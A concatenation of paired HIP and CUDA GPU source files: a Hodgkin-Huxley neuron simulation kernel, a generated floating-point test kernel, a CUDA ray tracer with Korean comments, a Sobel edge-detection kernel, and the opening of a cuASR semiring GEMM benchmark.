#define NVAR 2 #define NNEU %(nneu)d //NROW * NCOL // device compute submethods __device__ %(type)s compute_dV(%(type)s V, %(type)s n, %(type)s m, %(type)s h, %(type)s I, %(type)s C_m, %(type)s V_Na, %(type)s V_K, %(type)s V_l, %(type)s g_Na, %(type)s g_K, %(type)s g_l) { return (-1/C_m) * (g_K*n*n*n*n*(V-V_K) + g_Na*m*m*m*h*(V-V_Na) + g_l*(V-V_l)-I); } __device__ %(type)s compute_dn(%(type)s V, %(type)s n) { // LVS TODO: This seems hacky %(type)s alpha_n; if(V == -55.0) alpha_n = 0.1; else alpha_n = (-0.01*(55.0+V)) / (exp(-(55.0+V)/10.0)-1); %(type)s beta_n = 0.125 * exp(-(V+65)/80.0); return (alpha_n * (1-n) - beta_n * n); } __device__ %(type)s compute_dm(%(type)s V, %(type)s m) { %(type)s alpha_m; if(V == -40.0) alpha_m = 1.0; else alpha_m = (-0.1*(40+V)) / (exp(-(40+V)/10.0) - 1); %(type)s beta_m = 4 * exp(-(V+65)/18.0); return (alpha_m * (1-m) - beta_m * m); } __device__ %(type)s compute_dh(%(type)s V, %(type)s h) { %(type)s alpha_h = 0.07 * exp(-(V+65)/20.0); %(type)s beta_h = 1 / (exp(-(35+V)/10.0) + 1); return (alpha_h * (1-h) - beta_h * h); } // main kernel __global__ void hodgkin_huxley_rk4(%(type)s* g_V, %(type)s* g_n, %(type)s* g_m, %(type)s* g_h, int num_neurons, %(type)s* I_pre, %(type)s dt, %(type)s* C_m, %(type)s* V_Na, %(type)s* V_K, %(type)s* V_l, %(type)s* g_Na, %(type)s* g_K, %(type)s* g_l) { int bid = blockIdx.x; int cart_id = bid * NNEU + threadIdx.x; %(type)s I, V, n, m, h; if(cart_id < num_neurons) { I = I_pre[cart_id]; V = g_V[cart_id]; n = g_n[cart_id]; m = g_m[cart_id]; h = g_h[cart_id]; %(type)s k1_V, k2_V, k3_V, k4_V; %(type)s k1_n, k2_n, k3_n, k4_n; %(type)s k1_m, k2_m, k3_m, k4_m; %(type)s k1_h, k2_h, k3_h, k4_h; // RK4 using device derivative calculation functions k1_V = dt * compute_dV(V, n, m, h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k1_n = dt * compute_dn(V, n); k1_m = dt * compute_dm(V, m); k1_h = dt * compute_dh(V, h); k2_V = dt * compute_dV(V+0.5*k1_V, n+0.5*k1_n, m+0.5*k1_m, h+0.5*k1_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k2_n = dt * compute_dn(V+0.5*k1_V, n+0.5*k1_n); k2_m = dt * compute_dm(V+0.5*k1_V, m+0.5*k1_m); k2_h = dt * compute_dh(V+0.5*k1_V, h+0.5*k1_h); k3_V = dt * compute_dV(V+0.5*k2_V, n+0.5*k2_n, m+0.5*k2_m, h+0.5*k2_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k3_n = dt * compute_dn(V+0.5*k2_V, n+0.5*k2_n); k3_m = dt * compute_dm(V+0.5*k2_V, m+0.5*k2_m); k3_h = dt * compute_dh(V+0.5*k2_V, h+0.5*k2_h); k4_V = dt * compute_dV(V+k3_V, n+k3_n, m+k3_m, h+k3_h, I, C_m[cart_id], V_Na[cart_id], V_K[cart_id], V_l[cart_id], g_Na[cart_id], g_K[cart_id], g_l[cart_id]); k4_n = dt * compute_dn(V+k3_V, n+k3_n); k4_m = dt * compute_dm(V+k3_V, m+k3_m); k4_h = dt * compute_dh(V+k3_V, h+k3_h); // compute new quantities V += (k1_V + 2*(k2_V + k3_V) + k4_V)/6.0; n += (k1_n + 2*(k2_n + k3_n) + k4_n)/6.0; m += (k1_m + 2*(k2_m + k3_m) + k4_m)/6.0; h += (k1_h + 2*(k2_h + k3_h) + k4_h)/6.0; g_V[cart_id] = V; g_n[cart_id] = n; g_m[cart_id] = m; g_h[cart_id] = h; } }
4f2a758e8b32010551e805b61b1ba324e8fb1e29.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* This is a automatically generated test. Do not modify */ #include <stdio.h> #include <stdlib.h> #include <math.h> __global__ void compute(float comp, float var_1,float var_2,float var_3,float var_4,float var_5,float var_6,float var_7,float var_8,float var_9,float var_10,float var_11,float var_12,float var_13,float var_14,float var_15,float var_16,float var_17,float var_18,float var_19,float var_20,float var_21,float var_22,float var_23,float var_24,float var_25,float var_26,float var_27,float var_28) { float tmp_1 = var_1 * -0.0f - var_2 / +0.0f; float tmp_2 = (var_3 * (var_4 * var_5)); comp += tmp_2 - tmp_1 / +1.0103E-44f * var_6 * var_7 - (+0.0f * sinf(+1.5151E-44f - sqrtf((-0.0f + (var_8 / (var_9 + +0.0f)))))); if (comp <= log10f(atan2f(var_10 / -1.9340E-44f, +1.4925E-18f))) { float tmp_3 = +0.0f; comp = tmp_3 * var_11 - (var_12 * -1.8594E-36f); } if (comp == -1.3120E34f + (var_13 / fabsf((var_14 / expf((-1.0795E18f / (+0.0f + atan2f((-0.0f - (var_15 - -1.9336E-37f)), +1.9858E-35f - powf(log10f(-1.5112E-36f), (+1.7540E12f - (-1.6749E25f / +1.1231E-43f / (var_16 - var_17 * var_18)))))))))))) { float tmp_4 = (var_19 - (+1.6602E35f + var_20)); comp += tmp_4 - var_21 / var_22 / +1.1368E35f; comp += (var_23 / sqrtf((-1.5675E-37f + +1.5945E17f))); } if (comp == atanf((-1.5185E-43f - var_24))) { comp += var_25 * (+1.8088E-37f / -1.7803E35f - (var_26 / (-1.5110E22f - -1.7122E7f))); float tmp_5 = (-1.2107E-13f + (var_27 / +1.2324E-35f)); comp = tmp_5 - (var_28 / expf(asinf(-0.0f))); } printf("%.17g\n", comp); } float* initPointer(float v) { float *ret = (float*) malloc(sizeof(float)*10); for(int i=0; i < 10; ++i) ret[i] = v; return ret; } int main(int argc, char** argv) { /* Program variables */ float tmp_1 = atof(argv[1]); float tmp_2 = atof(argv[2]); float tmp_3 = atof(argv[3]); float tmp_4 = atof(argv[4]); float tmp_5 = atof(argv[5]); float tmp_6 = atof(argv[6]); float tmp_7 = atof(argv[7]); float tmp_8 = atof(argv[8]); float tmp_9 = atof(argv[9]); float tmp_10 = atof(argv[10]); float tmp_11 = atof(argv[11]); float tmp_12 = atof(argv[12]); float tmp_13 = atof(argv[13]); float tmp_14 = atof(argv[14]); float tmp_15 = atof(argv[15]); float tmp_16 = atof(argv[16]); float tmp_17 = atof(argv[17]); float tmp_18 = atof(argv[18]); float tmp_19 = atof(argv[19]); float tmp_20 = atof(argv[20]); float tmp_21 = atof(argv[21]); float tmp_22 = atof(argv[22]); float tmp_23 = atof(argv[23]); float tmp_24 = atof(argv[24]); float tmp_25 = atof(argv[25]); float tmp_26 = atof(argv[26]); float tmp_27 = atof(argv[27]); float tmp_28 = atof(argv[28]); float tmp_29 = atof(argv[29]); hipLaunchKernelGGL(( compute), dim3(1),dim3(1), 0, 0, tmp_1,tmp_2,tmp_3,tmp_4,tmp_5,tmp_6,tmp_7,tmp_8,tmp_9,tmp_10,tmp_11,tmp_12,tmp_13,tmp_14,tmp_15,tmp_16,tmp_17,tmp_18,tmp_19,tmp_20,tmp_21,tmp_22,tmp_23,tmp_24,tmp_25,tmp_26,tmp_27,tmp_28,tmp_29); hipDeviceSynchronize(); return 0; }
4f2a758e8b32010551e805b61b1ba324e8fb1e29.cu
/* This is a automatically generated test. Do not modify */ #include <stdio.h> #include <stdlib.h> #include <math.h> __global__ void compute(float comp, float var_1,float var_2,float var_3,float var_4,float var_5,float var_6,float var_7,float var_8,float var_9,float var_10,float var_11,float var_12,float var_13,float var_14,float var_15,float var_16,float var_17,float var_18,float var_19,float var_20,float var_21,float var_22,float var_23,float var_24,float var_25,float var_26,float var_27,float var_28) { float tmp_1 = var_1 * -0.0f - var_2 / +0.0f; float tmp_2 = (var_3 * (var_4 * var_5)); comp += tmp_2 - tmp_1 / +1.0103E-44f * var_6 * var_7 - (+0.0f * sinf(+1.5151E-44f - sqrtf((-0.0f + (var_8 / (var_9 + +0.0f)))))); if (comp <= log10f(atan2f(var_10 / -1.9340E-44f, +1.4925E-18f))) { float tmp_3 = +0.0f; comp = tmp_3 * var_11 - (var_12 * -1.8594E-36f); } if (comp == -1.3120E34f + (var_13 / fabsf((var_14 / expf((-1.0795E18f / (+0.0f + atan2f((-0.0f - (var_15 - -1.9336E-37f)), +1.9858E-35f - powf(log10f(-1.5112E-36f), (+1.7540E12f - (-1.6749E25f / +1.1231E-43f / (var_16 - var_17 * var_18)))))))))))) { float tmp_4 = (var_19 - (+1.6602E35f + var_20)); comp += tmp_4 - var_21 / var_22 / +1.1368E35f; comp += (var_23 / sqrtf((-1.5675E-37f + +1.5945E17f))); } if (comp == atanf((-1.5185E-43f - var_24))) { comp += var_25 * (+1.8088E-37f / -1.7803E35f - (var_26 / (-1.5110E22f - -1.7122E7f))); float tmp_5 = (-1.2107E-13f + (var_27 / +1.2324E-35f)); comp = tmp_5 - (var_28 / expf(asinf(-0.0f))); } printf("%.17g\n", comp); } float* initPointer(float v) { float *ret = (float*) malloc(sizeof(float)*10); for(int i=0; i < 10; ++i) ret[i] = v; return ret; } int main(int argc, char** argv) { /* Program variables */ float tmp_1 = atof(argv[1]); float tmp_2 = atof(argv[2]); float tmp_3 = atof(argv[3]); float tmp_4 = atof(argv[4]); float tmp_5 = atof(argv[5]); float tmp_6 = atof(argv[6]); float tmp_7 = atof(argv[7]); float tmp_8 = atof(argv[8]); float tmp_9 = atof(argv[9]); float tmp_10 = atof(argv[10]); float tmp_11 = atof(argv[11]); float tmp_12 = atof(argv[12]); float tmp_13 = atof(argv[13]); float tmp_14 = atof(argv[14]); float tmp_15 = atof(argv[15]); float tmp_16 = atof(argv[16]); float tmp_17 = atof(argv[17]); float tmp_18 = atof(argv[18]); float tmp_19 = atof(argv[19]); float tmp_20 = atof(argv[20]); float tmp_21 = atof(argv[21]); float tmp_22 = atof(argv[22]); float tmp_23 = atof(argv[23]); float tmp_24 = atof(argv[24]); float tmp_25 = atof(argv[25]); float tmp_26 = atof(argv[26]); float tmp_27 = atof(argv[27]); float tmp_28 = atof(argv[28]); float tmp_29 = atof(argv[29]); compute<<<1,1>>>(tmp_1,tmp_2,tmp_3,tmp_4,tmp_5,tmp_6,tmp_7,tmp_8,tmp_9,tmp_10,tmp_11,tmp_12,tmp_13,tmp_14,tmp_15,tmp_16,tmp_17,tmp_18,tmp_19,tmp_20,tmp_21,tmp_22,tmp_23,tmp_24,tmp_25,tmp_26,tmp_27,tmp_28,tmp_29); cudaDeviceSynchronize(); return 0; }
ade2c1fc492522a20a72d7887bacba9067dda00d.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <fstream> #include "mkRay.h" #include <time.h> #include "mkSphere.h" #include "mkHitablelist.h" #include <float.h> #include <hiprand/hiprand_kernel.h> #include "mkCamera.h" using namespace std; //MK: FB int nx = 1200; int ny = 600; int ns = 100; // limited version of checkCudaErrors from helper_cuda.h in CUDA examples //MK: #val val String Return ( 3) #define checkCudaErrors(val) check_cuda( (val), #val, __FILE__, __LINE__ ) //MK: Error void check_cuda(hipError_t result, char const *const func, const char *const file, int const line) { if (result) { cerr << "MK: CUDA ERROR = " << static_cast<unsigned int>(result) << " at " << file << ":" << line << " '" << func << "' \n"; // Make sure we call CUDA Device Reset before exiting hipDeviceReset(); exit(99); } } __global__ void mkCreateWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ *(dList) = new sphere(vec3(0, 0, -1), 0.5); *(dList + 1) = new sphere(vec3(0, -100.5, -1), 100); *dWorld = new hitableList(dList, 2); *dCamera = new camera(); } } //MK: ( 1-2) Random Vector #define RANDVEC3 vec3(hiprand_uniform(localRandState), hiprand_uniform(localRandState), hiprand_uniform(localRandState)) //MK: ( 1-3) Unit Sphere Random __device__ vec3 randomInUnitSphere(hiprandState_t *localRandState){ vec3 p; do{ p = 2.0f * RANDVEC3 - vec3(1.0, 1.0, 1.0); } while (p.squared_length() >= 1.0f); return p; } //MK: ( 1-1) Recurisve Loop __device__ vec3 color(const ray &r, hitable **dWorld, hiprandState_t *localRandState){ ray curRay = r; float curAttenuation = 1.0f; for(int i = 0; i < 50; i++){ hitRecord rec; if((*dWorld)->hit(curRay, 0.001f, FLT_MAX, rec)){ vec3 target = rec.p + rec.normal + randomInUnitSphere(localRandState); curAttenuation *= 0.5f; curRay = ray(rec.p, target-rec.p); } else{ vec3 unitDirection = unitVector(curRay.direction()); float t = 0.5f * (unitDirection.y() + 1.0f); vec3 c = (1.0f - t) * vec3(1.0, 1.0, 1.0) + t * vec3(0.5, 0.7, 1.0); return curAttenuation * c; } } return vec3(0.0, 0.0, 0.0); } __global__ void mkRender(vec3 *fb, int max_x, int max_y, int num_sample, camera **cam, hitable **dWorld) { //MK: Pixel ThreadId, BlockId int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; //MK: Pixel FB if((i >= max_x) || (j >= max_y)){ return; } //MK: FB Pixel int pixel_index = j*max_x + i; hiprandState_t rand_state; //hiprand_init(1984, pixel_index, 0, &rand_state); hiprand_init(pixel_index, 0, 0, &rand_state); vec3 col(0, 0, 0); for(int s = 0; s < num_sample; s++){ float u = float(i + hiprand_uniform(&rand_state))/float(max_x); float v = float(j + hiprand_uniform(&rand_state))/float(max_y); ray r = (*cam)->get_ray(u, v); col += color(r, dWorld, &rand_state); } fb[pixel_index] = col/float(num_sample); } __global__ void mkFreeWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ delete *(dList); delete *(dList + 1); delete *dWorld; delete *dCamera; } } int main() { //MK: Thread Block int tx = 8; int ty = 8; cout << "MK: Rendering a " << nx << "x" << ny << " Image "; cout << "MK: in " << tx << "x" << ty << " Thread Blocks.\n"; clock_t start, stop; start = clock(); int num_pixels = nx*ny; size_t fb_size = 3*num_pixels*sizeof(float); //MK: FB (hipMallocManaged Unitifed Memory ) //MK: CPU/GPU GPU/CPU vec3 *fb; checkCudaErrors(hipMallocManaged((void **)&fb, fb_size)); hitable **dList; hitable **dWorld; camera **dCamera; checkCudaErrors(hipMalloc((void **) &dList, 2 * sizeof(hitable *))); checkCudaErrors(hipMalloc((void **) &dWorld, sizeof(hitable *))); checkCudaErrors(hipMalloc((void **) &dCamera, sizeof(camera *))); hipLaunchKernelGGL(( mkCreateWorld), dim3(1), dim3(1), 0, 0, dList, dWorld, dCamera); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); //MK: GPU (CUDA) Thread Block, Grid dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); //MK: CUDA hipLaunchKernelGGL(( mkRender), dim3(blocks), dim3(threads), 0, 0, fb, nx, ny, ns, dCamera, dWorld); checkCudaErrors(hipGetLastError()); //MK: CUDA checkCudaErrors(hipDeviceSynchronize()); //MK: //MK: CPU string fileName = "Ch7_gpu.ppm"; ofstream writeFile(fileName.data()); if(writeFile.is_open()){ writeFile.flush(); writeFile << "P3\n" << nx << " " << ny << "\n255\n"; for (int j = ny-1; j >= 0; j--) { for (int i = 0; i < nx; i++) { size_t pixel_index = j*nx + i; int ir = int(255.99 * fb[pixel_index].r()); int ig = int(255.99 * fb[pixel_index].g()); int ib = int(255.99 * fb[pixel_index].b()); writeFile << ir << " " << ig << " " << ib << "\n"; } } writeFile.close(); } hipLaunchKernelGGL(( mkFreeWorld), dim3(1), dim3(1), 0, 0, dList, dWorld, dCamera); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipFree(dList)); checkCudaErrors(hipFree(dWorld)); checkCudaErrors(hipFree(fb)); checkCudaErrors(hipFree(dCamera)); //MK: stop = clock(); double timer_seconds = ((double)(stop - start)) / CLOCKS_PER_SEC; cout << "MK: GPU (CUDA) Took " << timer_seconds << " Seconds.\n"; return 0; }
ade2c1fc492522a20a72d7887bacba9067dda00d.cu
#include <fstream> #include "mkRay.h" #include <time.h> #include "mkSphere.h" #include "mkHitablelist.h" #include <float.h> #include <curand_kernel.h> #include "mkCamera.h" using namespace std; //MK: FB 사이즈 int nx = 1200; int ny = 600; int ns = 100; // limited version of checkCudaErrors from helper_cuda.h in CUDA examples //MK: #val은 val 전체를 String으로 Return 함 (출처 3) #define checkCudaErrors(val) check_cuda( (val), #val, __FILE__, __LINE__ ) //MK: Error 위치를 파악하기 위해서 사용 void check_cuda(cudaError_t result, char const *const func, const char *const file, int const line) { if (result) { cerr << "MK: CUDA ERROR = " << static_cast<unsigned int>(result) << " at " << file << ":" << line << " '" << func << "' \n"; // Make sure we call CUDA Device Reset before exiting cudaDeviceReset(); exit(99); } } __global__ void mkCreateWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ *(dList) = new sphere(vec3(0, 0, -1), 0.5); *(dList + 1) = new sphere(vec3(0, -100.5, -1), 100); *dWorld = new hitableList(dList, 2); *dCamera = new camera(); } } //MK: (코드 1-2) Random 하게 Vector을 생성하기 위한 코드 #define RANDVEC3 vec3(curand_uniform(localRandState), curand_uniform(localRandState), curand_uniform(localRandState)) //MK: (코드 1-3) Unit Sphere의 Random한 포인터를 생성하기 위한 코드 __device__ vec3 randomInUnitSphere(curandState *localRandState){ vec3 p; do{ p = 2.0f * RANDVEC3 - vec3(1.0, 1.0, 1.0); } while (p.squared_length() >= 1.0f); return p; } //MK: (코드 1-1) Recurisve 함수를 Loop을 사용하도록 변경함 __device__ vec3 color(const ray &r, hitable **dWorld, curandState *localRandState){ ray curRay = r; float curAttenuation = 1.0f; for(int i = 0; i < 50; i++){ hitRecord rec; if((*dWorld)->hit(curRay, 0.001f, FLT_MAX, rec)){ vec3 target = rec.p + rec.normal + randomInUnitSphere(localRandState); curAttenuation *= 0.5f; curRay = ray(rec.p, target-rec.p); } else{ vec3 unitDirection = unitVector(curRay.direction()); float t = 0.5f * (unitDirection.y() + 1.0f); vec3 c = (1.0f - t) * vec3(1.0, 1.0, 1.0) + t * vec3(0.5, 0.7, 1.0); return curAttenuation * c; } } return vec3(0.0, 0.0, 0.0); } __global__ void mkRender(vec3 *fb, int max_x, int max_y, int num_sample, camera **cam, hitable **dWorld) { //MK: Pixel 위치 계산을 위해 ThreadId, BlockId를 사용함 int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; //MK: 계산된 Pixel 위치가 FB사이즈 보다 크면 연산을 수행하지 않음 if((i >= max_x) || (j >= max_y)){ return; } //MK: FB Pixel 값 계산 int pixel_index = j*max_x + i; curandState rand_state; //curand_init(1984, pixel_index, 0, &rand_state); curand_init(pixel_index, 0, 0, &rand_state); vec3 col(0, 0, 0); for(int s = 0; s < num_sample; s++){ float u = float(i + curand_uniform(&rand_state))/float(max_x); float v = float(j + curand_uniform(&rand_state))/float(max_y); ray r = (*cam)->get_ray(u, v); col += color(r, dWorld, &rand_state); } fb[pixel_index] = col/float(num_sample); } __global__ void mkFreeWorld(hitable **dList, hitable **dWorld, camera **dCamera){ if(threadIdx.x == 0 && blockIdx.x == 0){ delete *(dList); delete *(dList + 1); delete *dWorld; delete *dCamera; } } int main() { //MK: Thread Block 사이즈 int tx = 8; int ty = 8; cout << "MK: Rendering a " << nx << "x" << ny << " Image "; cout << "MK: in " << tx << "x" << ty << " Thread Blocks.\n"; clock_t start, stop; start = clock(); int num_pixels = nx*ny; size_t fb_size = 3*num_pixels*sizeof(float); //MK: FB 메모리 할당 (cudaMallocManaged 는 Unitifed Memory를 사용 할 수 있도록 함) //MK: 필요에 따라 CPU/GPU에서 GPU/CPU로 데이터를 복사함 vec3 *fb; checkCudaErrors(cudaMallocManaged((void **)&fb, fb_size)); hitable **dList; hitable **dWorld; camera **dCamera; checkCudaErrors(cudaMalloc((void **) &dList, 2 * sizeof(hitable *))); checkCudaErrors(cudaMalloc((void **) &dWorld, sizeof(hitable *))); checkCudaErrors(cudaMalloc((void **) &dCamera, sizeof(camera *))); mkCreateWorld<<<1, 1>>>(dList, dWorld, dCamera); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); //MK: GPU (CUDA) 연산을 위해서 Thread Block, Grid 사이즈 결정 dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); //MK: CUDA 함수 호출 mkRender<<<blocks, threads>>>(fb, nx, ny, ns, dCamera, dWorld); checkCudaErrors(cudaGetLastError()); //MK: CUDA 연산이 완료되길 기다림 checkCudaErrors(cudaDeviceSynchronize()); //MK: 연산 시간과 끝 부분을 계산하여서 연산 시간을 측정함 //MK: CPU 코드와 동일하게 결과를 파일에 작성 string fileName = "Ch7_gpu.ppm"; ofstream writeFile(fileName.data()); if(writeFile.is_open()){ writeFile.flush(); writeFile << "P3\n" << nx << " " << ny << "\n255\n"; for (int j = ny-1; j >= 0; j--) { for (int i = 0; i < nx; i++) { size_t pixel_index = j*nx + i; int ir = int(255.99 * fb[pixel_index].r()); int ig = int(255.99 * fb[pixel_index].g()); int ib = int(255.99 * fb[pixel_index].b()); writeFile << ir << " " << ig << " " << ib << "\n"; } } writeFile.close(); } mkFreeWorld<<<1, 1>>>(dList, dWorld, dCamera); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaFree(dList)); checkCudaErrors(cudaFree(dWorld)); checkCudaErrors(cudaFree(fb)); checkCudaErrors(cudaFree(dCamera)); //MK: 연산 시간과 끝 부분을 계산하여서 연산 시간을 측정함 stop = clock(); double timer_seconds = ((double)(stop - start)) / CLOCKS_PER_SEC; cout << "MK: GPU (CUDA) Took " << timer_seconds << " Seconds.\n"; return 0; }
aadfd4f42881846a4093275568200708515006f9.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include "hip/hip_runtime.h" #include <opencv2/highgui/highgui.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/core/core.hpp> #include <opencv2/video/tracking.hpp> int divCeil(int a, int b) { if ((a % b) != 0) return a / b + 1; return a / b; } __global__ void kernel(unsigned char* imgIn, unsigned char* imgOut, int width, int height) { int col = blockIdx.x * blockDim.x + threadIdx.x; int line = blockIdx.y * blockDim.y + threadIdx.y; int Index = (line * width) + (col); if ((col < width - 2) && (line < height - 2)) { int i = Index; int Gx = imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = ((line + 1) * width) + (col); Gx += imgIn[i] * 2 + imgIn[i + 1] * 0 + imgIn[i + 2] * -2; i = ((line + 2) * width) + (col); Gx += imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = Index; int Gy = imgIn[i] * 1 + imgIn[i + 1] * 2 + imgIn[i + 2] * 1; i = ((line + 1) * width) + (col); Gy += imgIn[i] * 0 + imgIn[i + 1] * 0 + imgIn[i + 2] * 0; i = ((line + 2) * width) + (col); Gy += imgIn[i] * -1 + imgIn[i + 1] * -2 + imgIn[i + 2] * -1; imgOut[Index] = sqrtf(Gx * Gx + Gy * Gy) * 0.25; } return; } extern "C" bool apply_Sobel(cv::Mat * inputImage, cv::Mat * outputImage) { hipError_t cudaStatus; unsigned char* deviceIn; unsigned char* deviceOut; int BLOCK_SIZE = 32; unsigned int imageSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); unsigned int gradientSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); dim3 dimBlock(BLOCK_SIZE, BLOCK_SIZE); dim3 dimGrid(divCeil(inputImage->cols, BLOCK_SIZE), divCeil(inputImage->rows, BLOCK_SIZE)); cudaStatus = hipMalloc(&deviceIn, imageSize); cudaStatus = hipMalloc(&deviceOut, gradientSize); cudaStatus = hipMemcpy(deviceIn, inputImage->data, imageSize, hipMemcpyHostToDevice); kernel << <dimGrid, dimBlock >> > (deviceIn, deviceOut, inputImage->step1(), inputImage->rows); cudaStatus = hipGetLastError(); if (cudaStatus != hipSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", hipGetErrorString(cudaStatus)); hipFree(deviceIn); hipFree(deviceOut); return cudaStatus; } cudaStatus = hipDeviceSynchronize(); if (cudaStatus != hipSuccess) { fprintf(stderr, "hipDeviceSynchronize failed!"); hipFree(deviceIn); hipFree(deviceOut); return cudaStatus; } cudaStatus = hipMemcpy(outputImage->data, deviceOut, gradientSize, hipMemcpyDeviceToHost); hipFree(deviceIn); hipFree(deviceOut); return cudaStatus; }
aadfd4f42881846a4093275568200708515006f9.cu
#include "cuda_runtime.h" #include "device_launch_parameters.h" #include <stdio.h> #include "cuda_runtime.h" #include <opencv2/highgui/highgui.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/core/core.hpp> #include <opencv2/video/tracking.hpp> int divCeil(int a, int b) { if ((a % b) != 0) return a / b + 1; return a / b; } __global__ void kernel(unsigned char* imgIn, unsigned char* imgOut, int width, int height) { int col = blockIdx.x * blockDim.x + threadIdx.x; int line = blockIdx.y * blockDim.y + threadIdx.y; int Index = (line * width) + (col); if ((col < width - 2) && (line < height - 2)) { int i = Index; int Gx = imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = ((line + 1) * width) + (col); Gx += imgIn[i] * 2 + imgIn[i + 1] * 0 + imgIn[i + 2] * -2; i = ((line + 2) * width) + (col); Gx += imgIn[i] * 1 + imgIn[i + 1] * 0 + imgIn[i + 2] * -1; i = Index; int Gy = imgIn[i] * 1 + imgIn[i + 1] * 2 + imgIn[i + 2] * 1; i = ((line + 1) * width) + (col); Gy += imgIn[i] * 0 + imgIn[i + 1] * 0 + imgIn[i + 2] * 0; i = ((line + 2) * width) + (col); Gy += imgIn[i] * -1 + imgIn[i + 1] * -2 + imgIn[i + 2] * -1; imgOut[Index] = sqrtf(Gx * Gx + Gy * Gy) * 0.25; } return; } extern "C" bool apply_Sobel(cv::Mat * inputImage, cv::Mat * outputImage) { cudaError_t cudaStatus; unsigned char* deviceIn; unsigned char* deviceOut; int BLOCK_SIZE = 32; unsigned int imageSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); unsigned int gradientSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); dim3 dimBlock(BLOCK_SIZE, BLOCK_SIZE); dim3 dimGrid(divCeil(inputImage->cols, BLOCK_SIZE), divCeil(inputImage->rows, BLOCK_SIZE)); cudaStatus = cudaMalloc(&deviceIn, imageSize); cudaStatus = cudaMalloc(&deviceOut, gradientSize); cudaStatus = cudaMemcpy(deviceIn, inputImage->data, imageSize, cudaMemcpyHostToDevice); kernel << <dimGrid, dimBlock >> > (deviceIn, deviceOut, inputImage->step1(), inputImage->rows); cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); cudaFree(deviceIn); cudaFree(deviceOut); return cudaStatus; } cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize failed!"); cudaFree(deviceIn); cudaFree(deviceOut); return cudaStatus; } cudaStatus = cudaMemcpy(outputImage->data, deviceOut, gradientSize, cudaMemcpyDeviceToHost); cudaFree(deviceIn); cudaFree(deviceOut); return cudaStatus; }
023df7b5c9b09af407347ce1efeb7ba7230c58e3.hip
// !!! This is a file automatically generated by hipify!!! /*************************************************************************************************** * Copyright (c) 2020, Vijay Thakkar ([email protected]). **************************************************************************************************/ ////////////////////////////////////////////////////////////////////// // THIS BENCHMARK FILE IS GENERATED AUTOMATICALLY : DO NOT MODIFY // ////////////////////////////////////////////////////////////////////// #include "benchmark/benchmark.h" #include "cuasr/gemm/device/default_srgemm_configuration.h" #include "cuasr/gemm/device/srgemm.h" #include "cuasr/functional.h" #include "harness.h" //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } 